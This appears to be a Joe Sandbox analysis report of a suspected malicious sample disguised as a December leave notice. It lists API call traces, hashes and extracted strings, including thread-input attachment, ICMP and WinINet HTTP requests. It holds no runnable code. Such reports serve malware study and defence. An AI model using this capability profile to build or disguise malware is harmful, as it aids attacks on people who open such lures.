                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                      • String ID:
                                                      • API String ID: 4176008265-0
                                                      • Opcode ID: 1fe4c7fb94e1ebac8a1ad166937ed199ddbdb34f5a39522e378d83512cea4397
                                                      • Instruction ID: f38672322d94d9058f6d088dd63a381640d136befc1ca98d81d95f3847c20a46
                                                      • Opcode Fuzzy Hash: 1fe4c7fb94e1ebac8a1ad166937ed199ddbdb34f5a39522e378d83512cea4397
                                                      • Instruction Fuzzy Hash: 0E61C1B1A0024AAFDB21CFA4DA95FAE7BB8FB41314F14015DF851A3285D776BD44EB20
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FE9C98
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FE9C9B
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FE9CBF
                                                      • _memset.LIBCMT ref: 00FE9CD0
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FE9CE2
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FE9D5A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow_memset
                                                      • String ID:
                                                      • API String ID: 830647256-0
                                                      • Opcode ID: 16cf14196849a0b65ac1cd32e7ea6f2694317a0f8b3b0fe19867a16a2093577a
                                                      • Instruction ID: 6fd86347c761eef923aca911887e6f3de370c6f81e840a530d95d415e2875c6c
                                                      • Opcode Fuzzy Hash: 16cf14196849a0b65ac1cd32e7ea6f2694317a0f8b3b0fe19867a16a2093577a
                                                      • Instruction Fuzzy Hash: 7761BEB5900248AFDB20DFA8CC81EEE77B8EF09714F10015AFA54E7291C7B4AD41EB60
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00FB94FE
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00FB9549
                                                      • VariantInit.OLEAUT32(?), ref: 00FB955B
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FB957B
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00FB95BE
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FB95D2
                                                      • VariantClear.OLEAUT32(?), ref: 00FB95E7
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00FB95F4
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FB95FD
                                                      • VariantClear.OLEAUT32(?), ref: 00FB960F
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FB961A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 06e380f7c0516fe20e051ab42ac356dc0c8f3b21ca1c23a00b2ca2b4994ca1d8
                                                      • Instruction ID: 9572e7330fc7de7dad37945edc95b180ea1030857b743d2675465d91482accd0
                                                      • Opcode Fuzzy Hash: 06e380f7c0516fe20e051ab42ac356dc0c8f3b21ca1c23a00b2ca2b4994ca1d8
                                                      • Instruction Fuzzy Hash: 33417E35D00219AFCB12EFE4D8849DEBBB9FF08354F018065E542A3251DB75EA45DFA0
                                                      APIs
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • CoInitialize.OLE32 ref: 00FDADF6
                                                      • CoUninitialize.OLE32 ref: 00FDAE01
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,0100D8FC,?), ref: 00FDAE61
                                                      • IIDFromString.OLE32(?,?), ref: 00FDAED4
                                                      • VariantInit.OLEAUT32(?), ref: 00FDAF6E
                                                      • VariantClear.OLEAUT32(?), ref: 00FDAFCF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 834269672-1287834457
                                                      • Opcode ID: aff9d0c6aece000eca584994f72e4f3c227da46a105d5b81aaa8e2d4d5f30ab6
                                                      • Instruction ID: 0307d523744ba1cb153eff7badd91866a09ca895253477fb3b51a8b1e81d6ef0
                                                      • Opcode Fuzzy Hash: aff9d0c6aece000eca584994f72e4f3c227da46a105d5b81aaa8e2d4d5f30ab6
                                                      • Instruction Fuzzy Hash: B861DC716083019FD711EF95C848B6AB7E9AF88710F08084EF9859B291C774EE44EB97
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00FD8168
                                                      • inet_addr.WSOCK32(?,?,?), ref: 00FD81AD
                                                      • gethostbyname.WSOCK32(?), ref: 00FD81B9
                                                      • IcmpCreateFile.IPHLPAPI ref: 00FD81C7
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00FD8237
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00FD824D
                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00FD82C2
                                                      • WSACleanup.WSOCK32 ref: 00FD82C8
                                                      Strings
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: eacb5d0a4a749289a92324fb18c9039c4da3075f403bbfd38bce9cf8a293d84f
                                                      • Instruction ID: d0ff0d9572dabeb157d028cc5afa7e37759de404f22dad20346a75c7f548885f
                                                      • Opcode Fuzzy Hash: eacb5d0a4a749289a92324fb18c9039c4da3075f403bbfd38bce9cf8a293d84f
                                                      • Instruction Fuzzy Hash: A051A131604701AFD721EF64CC45B6AB7E5BF48360F08486AF99ADB390DB34E806EB51
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00FCE396
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FCE40C
                                                      • GetLastError.KERNEL32 ref: 00FCE416
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00FCE483
                                                      Strings
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: a3327d1404eb04f1943c1061d4944fbf28688875167b90a6917ba38fa1fb5ec0
                                                      • Instruction ID: 2151cff12c32199b68bfdc036ef430fdc7f7238aaa7ed8c1a8eedd676681a4c8
                                                      • Opcode Fuzzy Hash: a3327d1404eb04f1943c1061d4944fbf28688875167b90a6917ba38fa1fb5ec0
                                                      • Instruction Fuzzy Hash: A431923AA0020AAFDB15EBA4CE86FEDB7B8FF44310F14801DE505DB291DB759901EB91
                                                      APIs
                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FBB98C
                                                      • GetDlgCtrlID.USER32 ref: 00FBB997
                                                      • GetParent.USER32 ref: 00FBB9B3
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FBB9B6
                                                      • GetDlgCtrlID.USER32(?), ref: 00FBB9BF
                                                      • GetParent.USER32(?), ref: 00FBB9DB
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FBB9DE
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1383977212-1403004172
                                                      • Opcode ID: 17c246980ee3ec4141d71aacf6d771441266b193dc8372c894dc0539ba451805
                                                      • Instruction ID: 188f7f55104fa8e692b4f5fb9851ab98f6215d98e3a24626e46b7bfa723d76f9
                                                      • Opcode Fuzzy Hash: 17c246980ee3ec4141d71aacf6d771441266b193dc8372c894dc0539ba451805
                                                      • Instruction Fuzzy Hash: 6721A475900104AFDB05ABE5CC85EFEB7B5EF49310F100119F59197291DBB95815EF70
                                                      APIs
                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FBBA73
                                                      • GetDlgCtrlID.USER32 ref: 00FBBA7E
                                                      • GetParent.USER32 ref: 00FBBA9A
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FBBA9D
                                                      • GetDlgCtrlID.USER32(?), ref: 00FBBAA6
                                                      • GetParent.USER32(?), ref: 00FBBAC2
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FBBAC5
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1383977212-1403004172
                                                      • Opcode ID: 24bda4faf167dc1fcedbbe23315aa293549cb61ce88a4367ba86f9e06f5b002b
                                                      • Instruction ID: b7f95988d1ecc7973d34ce70562cc5ab4728b0dfdf6b25d8c59aecbc93f22c35
                                                      • Opcode Fuzzy Hash: 24bda4faf167dc1fcedbbe23315aa293549cb61ce88a4367ba86f9e06f5b002b
                                                      • Instruction Fuzzy Hash: F321D374A00104BFDB01ABA5CC85EFEBBB8EF48300F000015F99197191DBBD8815AF70
                                                      APIs
                                                      • GetParent.USER32 ref: 00FBBAE3
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00FBBAF8
                                                      • _wcscmp.LIBCMT ref: 00FBBB0A
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FBBB85
                                                      Strings
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1704125052-3381328864
                                                      • Opcode ID: f54a944a61039e2a1248a5d444fef00baacdb1421269b1108aad33909dd02fdc
                                                      • Instruction ID: 36762ec523f414fd7f0df304074684e0407bd450d69678e5112d3f0066b9f34c
                                                      • Opcode Fuzzy Hash: f54a944a61039e2a1248a5d444fef00baacdb1421269b1108aad33909dd02fdc
                                                      • Instruction Fuzzy Hash: 0D110677A08707FFFA206622EC06DE6379CDB95734F204026F944E5099EFE6A8516A24
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00FDB2D5
                                                      • CoInitialize.OLE32(00000000), ref: 00FDB302
                                                      • CoUninitialize.OLE32 ref: 00FDB30C
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00FDB40C
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00FDB539
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00FDB56D
                                                      • CoGetObject.OLE32(?,00000000,0100D91C,?), ref: 00FDB590
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00FDB5A3
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00FDB623
                                                      • VariantClear.OLEAUT32(0100D91C), ref: 00FDB633
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                      • String ID:
                                                      • API String ID: 2395222682-0
                                                      • Opcode ID: ef0bad3c9dd8b455e0cfb8d647b335cefa3a6a763590dd4b26e78587b083eebb
                                                      • Instruction ID: c9fa9a86e6de02daa7ac42a0cb1a40a94bf8749fcd62d735dfbd443c6e7e4d57
                                                      • Opcode Fuzzy Hash: ef0bad3c9dd8b455e0cfb8d647b335cefa3a6a763590dd4b26e78587b083eebb
                                                      • Instruction Fuzzy Hash: A0C13571608301EFC700EFA4C884A6AB7EABF89304F08495EF5899B351DB71ED05DB52
                                                      APIs
                                                      • __lock.LIBCMT ref: 00FAACC1
                                                        • Part of subcall function 00FA7CF4: __mtinitlocknum.LIBCMT ref: 00FA7D06
                                                        • Part of subcall function 00FA7CF4: EnterCriticalSection.KERNEL32(00000000,?,00FA7ADD,0000000D), ref: 00FA7D1F
                                                      • __calloc_crt.LIBCMT ref: 00FAACD2
                                                        • Part of subcall function 00FA6986: __calloc_impl.LIBCMT ref: 00FA6995
                                                        • Part of subcall function 00FA6986: Sleep.KERNEL32(00000000,000003BC,00F9F507,?,0000000E), ref: 00FA69AC
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00FAACED
                                                      • GetStartupInfoW.KERNEL32(?,01036E28,00000064,00FA5E91,01036C70,00000014), ref: 00FAAD46
                                                      • __calloc_crt.LIBCMT ref: 00FAAD91
                                                      • GetFileType.KERNEL32(00000001), ref: 00FAADD8
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00FAAE11
                                                      Similarity
                                                      • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 1426640281-0
                                                      • Opcode ID: 9b586a938b66fdb9bd6dbcd91317640453b6ad0c59abb4c170ad9c0249b64b07
                                                      • Instruction ID: 10a59ade33361d0ff077e1b59c7c26adc457ac4602dd56d52aa88642d4224aa2
                                                      • Opcode Fuzzy Hash: 9b586a938b66fdb9bd6dbcd91317640453b6ad0c59abb4c170ad9c0249b64b07
                                                      • Instruction Fuzzy Hash: 2481B1F1D053458FDB24CF68C9805A9BBF0AF0A330B24425DE4A6AB3C5D7399807EB61
                                                      APIs
                                                      • __swprintf.LIBCMT ref: 00FC67FD
                                                      • __swprintf.LIBCMT ref: 00FC680A
                                                        • Part of subcall function 00FA172B: __woutput_l.LIBCMT ref: 00FA1784
                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00FC6834
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00FC6840
                                                      • LockResource.KERNEL32(00000000), ref: 00FC684D
                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00FC686D
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00FC687F
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00FC688E
                                                      • LockResource.KERNEL32(?), ref: 00FC689A
                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00FC68F9
                                                      Similarity
                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                      • String ID:
                                                      • API String ID: 1433390588-0
                                                      • Opcode ID: 825f27f54ea79792927e8845caf0bfa552c82f176b5ca4fa31ed9580f7ea5c71
                                                      • Instruction ID: 077b6f964a31279e52ca215a9c46084b79ff29e086d8e56326e0ac00aa88f230
                                                      • Opcode Fuzzy Hash: 825f27f54ea79792927e8845caf0bfa552c82f176b5ca4fa31ed9580f7ea5c71
                                                      • Instruction Fuzzy Hash: F53162B590421BABDB219FA0DE45EBA7BA8FF08355F004429F941D2180E779D951EB70
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00FC4047
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC405B
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00FC4062
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC4071
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FC4083
                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC409C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC40AE
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC40F3
                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC4108
                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC4113
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: 6ce6f9e9f36b3569c8e902e2194f4b08faa6a3b589e5045ed438df04761d549d
                                                      • Instruction ID: c3f748f5f4c4a30af5ea38c7180b357d30855a7bbbcb2e5334a18e5259b54c49
                                                      • Opcode Fuzzy Hash: 6ce6f9e9f36b3569c8e902e2194f4b08faa6a3b589e5045ed438df04761d549d
                                                      • Instruction Fuzzy Hash: 2A3127B5900215AFDB32CF95DE97F6977B9BB54321F148009F984CA284CB7AEC408F64
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00F9B496
                                                      • SetTextColor.GDI32(?,000000FF), ref: 00F9B4A0
                                                      • SetBkMode.GDI32(?,00000001), ref: 00F9B4B5
                                                      • GetStockObject.GDI32(00000005), ref: 00F9B4BD
                                                      • GetClientRect.USER32(?), ref: 00FFDD63
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00FFDD7A
                                                      • GetWindowDC.USER32(?), ref: 00FFDD86
                                                      • GetPixel.GDI32(00000000,?,?), ref: 00FFDD95
                                                      • ReleaseDC.USER32(?,00000000), ref: 00FFDDA7
                                                      • GetSysColor.USER32(00000005), ref: 00FFDDC5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                      • String ID:
                                                      • API String ID: 3430376129-0
                                                      • Opcode ID: adac0254f1a9fbe7afca6d587c2d3ece0a242b2d72da5ab0fd6ce32c722ae356
                                                      • Instruction ID: dc92256b84fa926eb00cdda70012a5f7d531bce895b01741bf57eb40dd69bb81
                                                      • Opcode Fuzzy Hash: adac0254f1a9fbe7afca6d587c2d3ece0a242b2d72da5ab0fd6ce32c722ae356
                                                      • Instruction Fuzzy Hash: 71114C31500205BFEB226FE4EC08BE97F61EB08336F108665FAA6950E5CB760951EB20
                                                      APIs
                                                      • EnumChildWindows.USER32(?,00FBCF50), ref: 00FBCE90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 3555792229-1603158881
                                                      • Opcode ID: 31c9795130dcc6f6fe0ec88a191a67bc98bab286601ff6d9cf27f1d8097ac500
                                                      • Instruction ID: 1b2130341c9912e59c987103b4cd6fc6cbc69a46d5bc600555c5df5d5bf58285
                                                      • Opcode Fuzzy Hash: 31c9795130dcc6f6fe0ec88a191a67bc98bab286601ff6d9cf27f1d8097ac500
                                                      • Instruction Fuzzy Hash: D0917171A00506EBDB18EF61C882BEBFB75BF04310F508519E499A7251DF34A959EFE0
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F830DC
                                                      • CoUninitialize.OLE32(?,00000000), ref: 00F83181
                                                      • UnregisterHotKey.USER32(?), ref: 00F832A9
                                                      • DestroyWindow.USER32(?), ref: 00FF5079
                                                      • FreeLibrary.KERNEL32(?), ref: 00FF50F8
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FF5125
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: f96c228a5542ee686cff33779c001d454c83bdb19dc65e734fa7c4f61a9a5a38
                                                      • Instruction ID: 637f8bee3bdb9b432507ee7c049da58853512d89add9f0c19ac7e5e5fc1b578a
                                                      • Opcode Fuzzy Hash: f96c228a5542ee686cff33779c001d454c83bdb19dc65e734fa7c4f61a9a5a38
                                                      • Instruction Fuzzy Hash: 32913A346006068FC715FF64C899BA8F3A4FF04B14F5441A9E50AA7272DF38AE56EF50
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00F9CC15
                                                        • Part of subcall function 00F9CCCD: GetClientRect.USER32(?,?), ref: 00F9CCF6
                                                        • Part of subcall function 00F9CCCD: GetWindowRect.USER32(?,?), ref: 00F9CD37
                                                        • Part of subcall function 00F9CCCD: ScreenToClient.USER32(?,?), ref: 00F9CD5F
                                                      • GetDC.USER32 ref: 00FFD137
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FFD14A
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00FFD158
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00FFD16D
                                                      • ReleaseDC.USER32(?,00000000), ref: 00FFD175
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FFD200
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: 855a7555610b533c569fae0cb5dd8385501a05f26bcc1e1ebad7bde92972deb2
                                                      • Instruction ID: be9ea3068d0c9fffc3d5ebddd8a0daab3084b89563fa0c99174296e7b8fb1983
                                                      • Opcode Fuzzy Hash: 855a7555610b533c569fae0cb5dd8385501a05f26bcc1e1ebad7bde92972deb2
                                                      • Instruction Fuzzy Hash: 0171E431800209DFEF21DF64CC81ABA7BB6FF48364F144269EE55562AAC7359841EFA0
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                        • Part of subcall function 00F9B63C: GetCursorPos.USER32(000000FF), ref: 00F9B64F
                                                        • Part of subcall function 00F9B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00F9B66C
                                                        • Part of subcall function 00F9B63C: GetAsyncKeyState.USER32(00000001), ref: 00F9B691
                                                        • Part of subcall function 00F9B63C: GetAsyncKeyState.USER32(00000002), ref: 00F9B69F
                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00FEED3C
                                                      • ImageList_EndDrag.COMCTL32 ref: 00FEED42
                                                      • ReleaseCapture.USER32 ref: 00FEED48
                                                      • SetWindowTextW.USER32(?,00000000), ref: 00FEEDF0
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00FEEE03
                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00FEEEDC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                      • API String ID: 1924731296-2107944366
                                                      • Opcode ID: 3c76eb7053717bc56d824c5ca05841a69fa24ac41d07011751c56cf46f474946
                                                      • Instruction ID: 3682f998338632c20eaee33881eecf11ca2f741748d0ba6abe467f470b5b16e7
                                                      • Opcode Fuzzy Hash: 3c76eb7053717bc56d824c5ca05841a69fa24ac41d07011751c56cf46f474946
                                                      • Instruction Fuzzy Hash: D251B974204304AFD720EF60DC86FAA77E4BB88714F00491DF595972A2DB79E944DB62
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FD45FF
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00FD462B
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00FD466D
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00FD4682
